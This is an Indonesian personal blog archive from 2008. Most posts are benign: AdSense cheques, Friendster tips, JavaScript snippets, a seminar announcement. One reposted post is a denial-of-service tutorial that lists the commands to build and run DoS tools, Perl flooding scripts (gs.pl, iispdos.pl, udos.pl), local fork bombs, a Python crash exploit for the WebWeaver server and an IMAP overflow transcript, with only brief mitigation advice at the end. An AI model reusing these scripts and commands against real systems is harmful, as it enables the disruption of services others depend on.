Archive for 2008

Salah satu cara mencegah dan berjaga-jaga terhadap file yang berbahaya dan patut kita curigai sebagai virus atau calon virus ialah extensi file (file extension) tersebut.

Namun di setting defaultnya windows, kita tidak dapat melihat extensi sebuah file jadi ada sedikit setting windows yang perlu kita rubah biar kita dapat melihat extensi sebuah file. Lihat cara merubah setting windows untuk melihat extensi sebuah file dsini.

Extensi file apa saja yang patut kita curigai sebagai virus? Berikut daftarnya :

com - executable file untuk sebuah kegiatan tidak lebih besar dari 64 KB
exe - executable file atau self-extracting archive
sys - system file
prg - kegiatan text untuk dBase, Clipper atau Microsoft Visual FoxPro, atau WAVmaker program
bin - binary file
bat - batch file
cmd - command file Microsoft Windows NT (mirip dengan .bat file untuk DOS), OS/2.
dpl - compressed Borland Delphi library
dll - dynamic loading library
scr - Microsoft Windows splash screen
cpl - Microsoft Windows control panel module
ocx - Microsoft OLE (Object Linking and Embedding) object
tsp - kegiatan that runs in split-time mode
drv - device driver
vxd - Microsoft Windows virtual device driver
pif - kegiatan information file
lnk - Microsoft Windows link file
reg - Microsoft Windows system register key file
ini - initialization file
cla - Java class
vbs - Visual Basic script
vbe - BIOS video extension
js, jse - JavaScript source text
htm - hypertext document
htt - Microsoft Windows hypertext header
hta - hypertext kegiatan for Microsoft Internet Explorer
chm - compiled HTML file
wsh - Microsoft Windows Script Host file
wsf - Microsoft Windows script
the - Microsoft Windows 95 desktop wallpaper
eml - Microsoft Outlook Express e-mail file
nws - Microsoft Outlook Express new e-mail file
msg - Microsoft Mail e-mail file
plg - e-mail

Extensi File Yang Dicurgai Sebagai Virus

Wednesday, 17 December 2008
2 Hari yang kemudian cek adsense ku nyampe kurang lebih sekitar 3 ahad lebih saya nunggu sehabis pengiriman. kali ini saya noba ga pake DHL, tapi pake pos biasa yah gak lama2 amat kok dari pada dipotong 24 dollar kaya pengalaman pertamaku dapet adsense, pengen buru-buru aja.. hehe.. eh ternyata sekitar seminggu lebih gres nyampe..

dari pengalaman ku slama 2 kali dapet adsense (2 kali juga pengalaman lho...) pengiriman adsense dikirim ga menurut prioritas, jadi ngirimnya borongan. pas kemarin saya dapet cek temen ku juga pribadi dapet cek. berarti pengiriman dilakukan secara serentak baik pake DHL ato pos biasa sama ajah.

oke pribadi aja saya cairin cek adsenseku :)

 Hari yang kemudian cek adsense ku nyampe kurang lebih sekitar  Mencairkan cek adsense di banyak sekali bank
pengalaman pertama saya cairin cek adsense ku di BSM (Bank Syariah Mandiri) Cabangan Buncit, Jakarta Selatan. saya pilih BSM ya alasannya ialah emang saya cuma punya rekening di BSM aja. di Bank Syariah Mandiri saya menerima penggalan tidak mengecewakan gede, kan waktu pertama kali saya dapet 94 dollar saya peke kliring jdi pribadi di debet ke rekening ku, saya dapet sekitar Rp 650.000,00 (fyuuh...hasil sehabis 5 bulan lebih.. hiks...)
 Hari yang kemudian cek adsense ku nyampe kurang lebih sekitar  Mencairkan cek adsense di banyak sekali bank

pengalaman kedua, saya denger kabar dari temen ku katanya cairin cek di BRI potongannya kecil cuma Rp 50.000,- saya jadi tertarik, kali ini saya dapet 112 dollar yah tidak mengecewakan nambah dikit dari sebelumnya :) .aku juga sempet tanya-tanya sama rekan bisnis ku cara nyairin cek, katanya sih lebih baik ke bank asal yang ngeluarin ceknya (citibank). ya citibank, jadi pilihan pertamaku alasannya ialah temanku bilang klo di citibank kita ga perlu buka rekening dan bisa pribadi cair! wah, saya pribadi semangat aja. siang itu saya pribadi berangkat ke citibank melawai, Jakarta Selatan. hingga disana saya di tanyain satpam "permisi mas, ada apa ya?" lumayan ramah si, tapi masa cuma saya doang yang ditanyain kaya gitu nasabah lainnya ga pake ditanyain, mungkin alasannya ialah tampang ku yang cukup amburadul kali..hehe... sehabis saya bilang pengen cairin cek satpam itu pribadi memberi tahu tempatnya "di sebelah sana mas, :)" (pake senyum) kemudian saya menghampiri teller citibank yang tidak mengecewakan cantik. sehabis saya sodorkan cek adsense berwarna hijau teller itu pun pribadi ngerti dan menjelaskan cara pencairannya. jadi kita harus bayar di muka sebesar Rp 100.000 ,- dulu sebelum cek dicairkan, kemudian pihak citibank akan meminta identitas kita untuk nanti di hubungi pihak citibank saat cek telah cair. kata teller citibank si cek bakalan cair dalam 30-40 hari kerja gitu.

pengalman ketiga, coming soon cz, belum dapet cek yg ketiga masih nunggu, kini aja gres 49 dollar, tunggu aja ya...

Mencairkan Cek Adsense Di Aneka Macam Bank

Wednesday, 29 October 2008
Bagi Anda yang ingin mencar ilmu menciptakan website sendiri Anda sanggup mengikuti kursus/pelatihan menciptakan website terutama dengan CMS baik joomla maupun mambo, biaya kurusus Rp. 75.000/pertemuan satu pertemuan 90 menit tidak termasuk biaya pembelian bahan-bahan (Domain dan Webhostning).

Fasilitas untuk mengikuti kursus/pelatihan menciptakan website ini yaitu dengan satu akseptor satu komputer, kursus dilakukan setiap hari sabtu dan ahad di Faiza Net, Jl. bangka II Mampang Jakarta selatan

Anda sanggup menghubungi kami melalui Email atau telpon eksklusif ke support untuk mengikuti kursus ini

Salah satu kelebihan kursus/pelatihan website ini, Anda akan eksklusif mempunyai website sendiri

keterangan lebih lanjut buka di website resminya kursus website

Kursus Website, Training Menciptakan Website Sendiri

Saturday, 12 July 2008
friendster, sibuah situs social bookmarking yang banyak digandrungin anak muda jaman sekarang. katanya klo ga punya FS (friendster) di bilang gaptek, ga gaul, dll dah..

mereka semua (para anak muda termasuk gw :D) berlomba-lomba untuk mempercantik, memperbagus profile frienster mereka mulai dari background sampe banyak sekali aplikasi lainnya.

berikut ini gw mo ngasih sedikit tips untuk menaruh music player / mp3 player di friendster lw semua semoga tambah keren ... :D

berikut ini daftar website penyedia konten music player dan mp3 player untuk profile friendster lw pada.
nanti di sana lw tinggal browse dan pilih aja lagu ke sukaan lw, nah abis milih situs itu akan ngasih code yang nantinya harus lw copy paste ke media box fs lw .. gt.. bersambung dulu yah dah mau tiga jam nih.. maklum maen di warnet... hiks.. :(

Memberi Music Player Di Profile Friendster

Saturday, 14 June 2008
Indonesian Hacker's Night

Brosur bergambar - Klik disini!

Atau

Bukti pengiriman dapat di Fax melalui ke nomor  Seminar Hacking! Indonesian Hacker's Night

*Pembicara:*
- Onno W. Purbo (Indonesia ICT Expert)
- Desmond Devendran (IT Security Expert)*
- Eko Indrajit (Head of ID-SIRTII)
- Anselmus Ricky (Also known as Th0R)
- Semi Yulianto (Certified Trainer & IT Consultant EC-Council)
- Irvan (Professional IT Consultant & Indonesian Book Writer)
- Jim Geovedi (Member of HERT & IT Consultant of PT. Bellua Asia Pacific)
- Eugene Dokukin (Expert White-hat Russia Hacker)*

*Pelaksanaan:*
Hari/Tanggal: Kamis, 12 Juni 2008.
Pukul: 10.00 - 17.00 WIB (Seminar & Discussion Panel) - There will be Night-Socializing Time!
Tempat: Jakarta Convention Center (JCC), Merak Room.

*Kontribusi:*
Publik/Profesional: Rp. 200,000
Pelajar/Mahasiswa: Rp. 150,000
Pelanggan InfoKomputer: Rp. 150,000
Early Bird: Rp. 125,000 (Sebelum tanggal 30 May)

Biaya Bisa ditransfer melalui :
BCA an. PT. Prima Infosarana Media No. Acc: 0123005519
Bukti pengiriman dapat di Fax melalui ke nomor (021) 536-0411


*Fasilitas:*
- Majalah InfoKomputer
- Lunch & Coffee Break
- Voucher Diskon buku berbau Hacking
- Souvenir
- CD Materi
- Sertifikat Seminar

--- Tempat Terbatas! ---


buat nonton n jalan kita abis2n duit! tpi buat ilmu?? tunggu apa lagi? jarang sekali kesempatan ini tiba :D

Seminar Hacking! Indonesian Hacker's Night

Monday, 2 June 2008
Hari ini tanggal 16 Mei, gw buka internet.. biasa, yg pertama ke buka di browser niscaya mesin pencari google . kaget jg liat logo google yang sedikit aneh, emang udah kebiasaan sih google ganti2 logo sesuai dengan hari2 bersejarah. tpi hari ini google logonya agak aneh..

 yg pertama ke buka di browser niscaya mesin pencari  Laser PertamaLogo google 16 may 2008, memperingati hari inovasi laser

pas gw klik.. terbuka hasil pencarian laser pertama.. jadi ingin tau gimana sih sejarahnya laser.. yuk kita cari tau.. :D

Laser singkatan dari Light Amplification by Stimulated Emission of Radiation. Pertama kali di coba pertama kali di laboratorium Hughes Research Laboratories oleh Theodore Harold Maiman pada tanggal 16 mei 1960. sehabis itu laser berkembang dan dipakai diberbagai industri komputer dan elektronik, sperti halnya alat pembaca cd yang kita kenal dengan vcd player, terus cd-room. dan lain-lain.

begitulah sekilas wacana laser yang dapat gw tulis. sumber : en.wikipedia.org/wiki/laser

Laser Pertama

Sunday, 18 May 2008


Hari ini ga jaga warnet! cm maen aja... jadi sanggup konsen buat edit dan ngatur website plus blog ku. hari ini ak ngedit portal ku ngedit form buat masukin url web+judul pake php.

tpi ada pelajaran sdikit perihal javascript yang alhasil sanggup saya dapat. Begini sekenario awalnya.

halaman submit > submit > halaman terimakasih(otomtis redirect) > halaman submit

nah pada halaman terimakasih ak menunjukkan javascript redirection yang pake waktu. jadi halaman terimakasih itu akan otomatis ter Redirect ke halaman lain tergantung setting waktu yang kita mau.

berikut script javascript time redirection :


<script type=text/javascript>
function delay() {
window.location="http://udik.co.cc/";
}
</script>

<body onLoad="setTimeout('delay()',3000)">


Yang warna merah itu javascriptnya ditaroh di antara tag <head>
Yang warna biru itu alamat url yang akan kita tuju
Yang warna hijau itu tag body biasa yang di modifikasi sedikit
Yang warna pink itu time nya atau waktu delay/jeda sebelum halaman otomatis ke redirect

Javascript Time Redirection

Tuesday, 6 May 2008
duh, hari ini gw harus upload banyak file buat bikin forum. tpi buaaannyaak bgt filenya duuuh gimana ya??

hmm.. gwe tanya ma temen gw ktnya pake ftp aja semoga uploadnya gampang.. ok pribadi aja meluncur ke cpanelnya upload file lewat ftp ;) . selamat mencoba :D


Baca Juga : Tutorial Cmd Shutdown

Upload File Lewat Ftp

Saturday, 26 April 2008
1. Apa itu DoS ?
2. Apa motif cracker untuk melaksanakan itu ?
3. Bagaimana cara melakukannya ?
4. Apa yang harus saya lakukan untuk mencegahnya ?

Semuanya untuk anda, ENJOY !!.

.o0 Apa itu Denial of Service (DoS) ?

Denial of Service yakni aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak sanggup memakai layanan tersebut. Dampak selesai dari aktifitas ini menjurus kepada tehambatnya aktifitas korban yang sanggup berakibat sangat fatal (dalam kasus tertentu). Pada dasarnya Denial of Service merupakan serangan yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana admin akan berada pada kondisi yang membingungkan antara layanan dan kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti aturan ini.

Beberapa aktifitas DoS adalah:

1. Aktifitas 'flooding' terhadap suatu server.
2. Memutuskan koneksi antara 2 mesin.
3. Mencegah korban untuk sanggup memakai layanan.
4. Merusak sistem semoga korban tidak sanggup memakai layanan.


.o0 Motif penyerang melaksanakan Denial of Service

Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker dalam melaksanakan Denial of Service yaitu:

1. Status Sub-Kultural.
2. Untuk mendapat akses.
3. Balas dendam.
4. Alasan politik.
5. Alasan ekonomi.
6. Tujuan kejahatan/keisengan.

Satatus subkultural dalam dunia hacker, yakni sebuah unjuk gigi atau lebih sempurna kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan Denial of Service merupakan aktifitas hacker diawal karirnya. Alasan politik dan ekonomi untuk ketika kini juga merupakan alasan yang paling relevan. Kita bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of Service'. Beberapa kasus serangan virus semacam 'code-red' melaksanakan serangan DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi, komputer ini disebut 'zombie' dalam jargon.Lebih relevan lagi, keisengan merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk mendapat program-program DoS, menyerupai nestea, teardrop, land, boink, jolt dan vadim. Program-program DoS sanggup melaksanakan serangan Denial of Service dengan sangat tepat, dan yang terpenting sangat gampang untuk melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell yang berupa ./nama_program argv argc ... .o0 Denial of Sevice, serangan yang menghabiskan resource.

Pada dasarnya, untuk melumpuhkan sebuah layanan diperlukan pemakaian resource yang besar, sehingga komputer/mesin yang diserang kehabisan resource dan manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:

A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD


A. Swap Space
Hampir semua sistem memakai ratusan MBs spasi swap untuk melayani undangan client. Spasi swap juga dipakai untuk mem-'forked' child process. Bagaimanapun spasi swap selalu berubah dan dipakai dengan sangat berat. Beberapa serangan Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

B. Bandwidth
Beberapa serangan Denial of Service menghabiskan bandwidth.

C. Kernel Tables
Serangan pada kernel tables, bisa berakibat sangat jelek pada sistem. Alokasi memori kepada kernel juga merupakan sasaran serangan yang sensitif. Kernel mempunyai kernelmap limit, jikalau sistem mencapai posisi ini, maka sistem tidak bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

D. RAM
Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak mau harus di re-boot.

E. Disk
Serangan klasik banyak dilakukan dengan memenuhi Disk.

F. Caches

G. INETD
Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan
bekerja.


.o0 Teknik Melakukan Denial of Service

Melakukan DoS sesungguhnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan dampak jelek terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya yakni menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga
tidak begitu menarik. Kita akan bahas tipe-tipe serangan DoS.

1. SYN-Flooding
SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole' pada ketika koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegahmenolak cracker untuk mengakses sistem.
2. Pentium 'FOOF' Bug
Merupakan serangan Denial of Service terhadap prosessor Pentium yang mengakibatkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis sistem operasi yang dipakai tetapi lebih spesifik lagi terhadap prosessor yang dipakai yaitu pentium.
3. Ping Flooding
Ping Flooding yakni brute force Denial of Service sederhana. Jika serangan dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka mesin korban tidak sanggup mengirimkan paket data ke dalam jaringan (network). Hal ini terjadi lantaran mesin korban di banjiri (flood) oleh peket-paket ICMP. Varian dari serangan ini disebut "smurfing" (http://www.quadrunner.com/ chuegen/smurf.txt).

Serangan memakai exploits.

Beberapa hal yang harus dipahami sebelum melaksanakan serangan ini adalah:
A. Serangan membutuhkan Shell Linux (Unix/Comp)
B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan fungsi search semoga lebih mudah)
C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

1. KOD (Kiss of Death)
Merupakan tool Denial of Service yang sanggup dugunakan untuk menyerang Ms. Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini yakni menciptakan hang/blue screen of death pada komputer korban. Cara penggunaan:
A. Dapatkan file kod.c
B. Compile dengan Gcc: $ gcc -o kod kod.c
C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]
Kelemahan dari tool ini yakni tidak semua serangan berhasil, bergantung kepada jenis sistem operasi dan konfigurasi server sasaran (misalnya: blocking)

2. BONK/BOINK
Bong yakni dasar dari teardrop (teardrop.c). Boink merupakan Improve dari bonk.c yang sanggup menciptakan crash mesin MS. Windows 9x dan NT

3. Jolt
Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet yang tinggi sekali kepada korban.

4. NesTea
Tool ini sanggup membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows versi awal. Versi improve dari NesTea dikenal dengan NesTea2

5. NewTear
Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk (bonk.c)

6. Syndrop
Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target serangan yakni Linux dan Windows

7. TearDrop
TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini yakni Blue Screen of Death

Serangan pribadi (+ 31337)

1. Ping Flood
Membutuhkan saluran root untuk melaksanakan ini pada sistem Linux. Implementasinya sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran. bash # ping -fs 65000 [ip_target]
2. Apache Benchmark
Program-program Benchmark WWW, dipakai untuk mengukur kinerja (kekuatan) suatu web server, namun tidak tertutup kemungkinan untuk melaksanakan penyalahgunaan. bash $ /usr/sbin/ab -n 10000 -c 300 \ http://korban.com/cgi-bin/search.cgi?q= ... cukup+umum (diketik dalam 1 baris!) Akan melaksanakan 10000 request paralel 300 kepada host korban.com
3. Menggantung Socket
Apache mempunyai kapasitas jumlah koneksi yang kecil. Konfigurasi universal oleh Apache Software Foundation yakni MaxClients 150, yang berarti hanyak koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients. Jumlah ini sedikit banyak sanggup berkurang mengingat browser lebih dari 1 request simultan dengan koneksi terpisah-pisah.

Penyerang hanya melaksanakan koneksi kemudian diam, pada ketika itu apache akan menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit). Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan, seakan-akan server korban tewas.

Script gs.pl (gantung socket)

#!/usr/bin/perl
#
# Nama Script : gs.pl
# Tipe : Denial of Service (DoS)
# Auth : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
# URL : http://www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print "Gunakan: perl gs.pl [host] [port] \n";
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto => "tcp"
or die; print "$_\n"
}
# END. 27 Oktober 2003
# Lakukan dari beberapa LoginShell (komputer) !

DoS-ing Apache lagi !!

Beberapa teladan skrip perl untuk melaksanakan DoS-ing secara local.

1. Fork Bomb, habiskan RAM

#!/usr/bin/perl
fork while 1;

2. Habiskan CPU

#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i

3. Habiskan Memory

#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = "X" x 0xff; }

4. Serangan Input Flooding
Saya mengamati serangan ini dari beberapa advisories di BugTraq. Remote Buffer Overflow yang menghasilkan segmentation fault (seg_fault) sanggup terjadi secara remote jikalau demon (server) tidak melaksanakan verifikasi input sehingga input membanjiri buffer dan mengakibatkan jadwal tidak boleh secara paksa.

Beberapa 'proof of concept' sanggup dipelajari melalui beberapa teladan ini.

1. Serangan kepada IISPop EMAIL Server.
Sofie : Email server
Vendor : http://www.curtiscomp.com/
TIPE : Remote DoS

IISPop akan crash jikalau diserang dengan pengiriman paket data sebesar 289999 bytes, versi yang vuneral dan telah di coba yakni V: 1.161 dan 1.181

Script: iispdos.pl

#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : http://www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;
}
# Data 289999 bytes
$buff = "A" x 289999;

print "Connecting ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "110",
Proto=> "tcp") or die;
print "Error: $_\n";
print "Connect !!\n";
print $connect "$buff\n";
close $connect;
print "Done \n";
print "POST TESTING sesudah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "110",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# END.

2. Membunuh wzdftpd.
Sofie : wzdftpd
Vendor : http://www.wzdftpd.net

Proof of Concept:

% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host

wzdftpd crash sesudah diberikan perintah/command PORT !

3. Serangan 32700 karakter, DoS BRS WebWeaver.
Sofie : BRS WebWeaver V. 1.04
Vendor : http://www.brswebweaver.com
BugTraqer : euronymous /F0KP

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your sasaran hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{

Serangan diatas mengirimkan 32700 huruf yang mengakibatkan server crash !

4. Buffer Overflow pada MailMAX 5
Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10. Apa yang harus saya lakukan untuk mencegahnya  Semua wacana DoS (Denial of Service)
Vendor : http://www.smartmax.com
BugTraqer : matrix at 0x36.org

Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command
SELECT. Dampak dari serangan ini yakni berhentiya server dan harus di-restart secara
manual.

Contoh eksploitasi:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------

Perhatian !, teladan eksploitasi diatas memakai NetCat (nc), anda bisa dapatkan tool
ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat'


Jika kita perhatikan, serangan flooding mempunyai kesamaan, yaitu - tentu saja - membanjiri input dengan data yang besar. Serangan akan lebih efektif jikalau dilakukan pada komputer esekutor yang mempunyai bandwidth lebar.

Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.

Dari step diatas, kita bisa menciptakan sebuah skrip universal untuk melaksanakan serangan DoS. Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim).

-- udos.pl --

#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
# URL : http://www.echo.or.id
#
use IO::Socket;
#
if (!$ARGV[2]) {
print "Gunakan % perl udos.pl [host] [port] [data] \n";
print "Contoh :\n";
print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
exit;
}
# Siapkan data
$buffer = "A" x $ARGV[2];
# Connect -> Korban
print "Connecting ... -> $ARGV[0] \n";
$con = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto=> "tcp") or die;
print "Error: $_ \n";
# Connect !
print "Connect !! \n";
print $con "$buffer\n";
close $con;
print "Done. \n";
print "POST TESTING sesudah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# End.

-- udos.pl --

Skrip sederhana diatas hanya melaksanakan kekerabatan dengan server korban, kemudian mengirimkan flood dan melaksanakan post testing. Dengan sedikit pemprograman anda sanggup menciptakan sebuah 'Mass Flooder' atau 'Brute Force Flooder', tergantung pada kreatifitas anda !


.o0 Penanggulangan serangan Denial of Service

Sejujurnya, pecahan inilah yang paling sulit. Anda bisa lihat bagaimana mudahnya menggunaka sploits/tool untuk membekukan Ms Windows, atau bagaimana mudahnya melaksanakan input flooding dan menciptakan tool sendiri. Namun Denial of service yakni problem layanan publik.Sama halnya dengan anda mempunyai toko, sekelompok orang jahat bisa saja masuk beramai-ramai sehingga toko anda penuh. Anda bisa saja mengatasi 'serangan' ini dengan 'menutup' toko anda - dan ini yakni cara paling efektif - namun tanggapan kekanak-kanakan demikian tentu tidak anda harapkan.

1. Selalu Up 2 Date.
Seperti teladan serangan diatas, SYN Flooding sangat efektif untuk membekukan Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 mempunyai option untuk menolak cracker untuk mengakses system.

2. Ikuti perkembangan security
Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal. Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet' dan 'terlatih' akan sangat gampang untuk memasuki sistem dan merusak - tidak tertutup kemungkinan untuk melaksanakan Denial of Service -. Berhubungan dengan 'Selalu Up 2 Date', Denial of service secara pribadi dengan Flooding sanggup diatasi dengan menginstall patch terbaru dari vendor
atau melaksanakan up-date.

3. Teknik pengamanan httpd Apache.
+ Pencegahan serangan Apache Benchmark. Hal ini sesungguhnya sangat sulit untuk diatasi. Anda bisa melaksanakan identifikasi terhadap pelaku dan melaksanakan pemblokiran manual melalui firewall atau prosedur kontrol Apache (Order, Allow from, Deny From). Tentunya teknik ini akan sangat membosankan dimana anda sebagai seorang admin harus teliti. Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi jumlah pengunjung akan menjaga toko anda dari 'Denial of Service'. Jangan lupa juga menambah RAM.

4. Pencegahan serangan non elektronik.
Serangan yang paling efektif intinya yakni local. Selain efektif juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman, atau semua user yakni orang 'baik'. Pertimbangkan semua aspek. Anda bisa menerapkan peraturan tegas dan hukuman untuk mencegah user melaksanakan serangan dari dalam. Mungkin cukup efektif jikalau dibantu oleh kedewasaan berfikir dari admin dan user bersangkutan.

di kutip dari http://yogyafree.net/forum2

Semua Wacana Dos (Denial Of Service)

Wednesday, 23 April 2008
Pay Per Click ( PPC ) itu yaitu salah satu aktivitas periklanan yang dimana apabila anda menjadi publisher salah satu perusahaan periklanan, kiprah anda hanyalah cukup memasarkan, mempublikasikan, atau memasang iklan yang nanti diberikan oleh perusahaan periklanan tersebut.

gimana cara dapet duitnya??
hmm namanya juga aktivitas pay per click, jadi apabila iklan yang tadi kita pasang dan publikakan di klik orang atau user maka kita akan dapet komisi deh :D

gimana cara dapet mempublikasikan atau cara masag iklannya??
cara masang iklannya ya kita taro di blog atau website, (klo blom punya bikin dong :D )

Apa Itu Pay Per Click ?

Monday, 14 April 2008
javascript onunload apa yah?
hemmm klo berdasarkan gwe sih javascript onunload itu ialah javascript yang bekerja apabila halaman web yang dipasanging javascript tersebut di close atau di ganti menjadi halaman lain,

sperti contohnya halaman ini (klik aja)

setelah tau apa itu dan bagaimana javascript onunload bekerja ini aku berikan script yang aku sanggup kan gara-gara sering ngedit friendster saya.. hehe..


//goodbye
function goodbye(){
alert(' duduww '+parent.pageViewerFName+' ');
}
parent.window.onunload=goodbye;


script di atas ialah untuk menampilakan alert tapi efeknya akan mumcul sesudah kita berpindah/berganti/mengclose halaman tersebut :)

negerti kan? hihi...

Javascript Onunload

Wednesday, 13 February 2008

- Copyright © topmost-azyrham - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -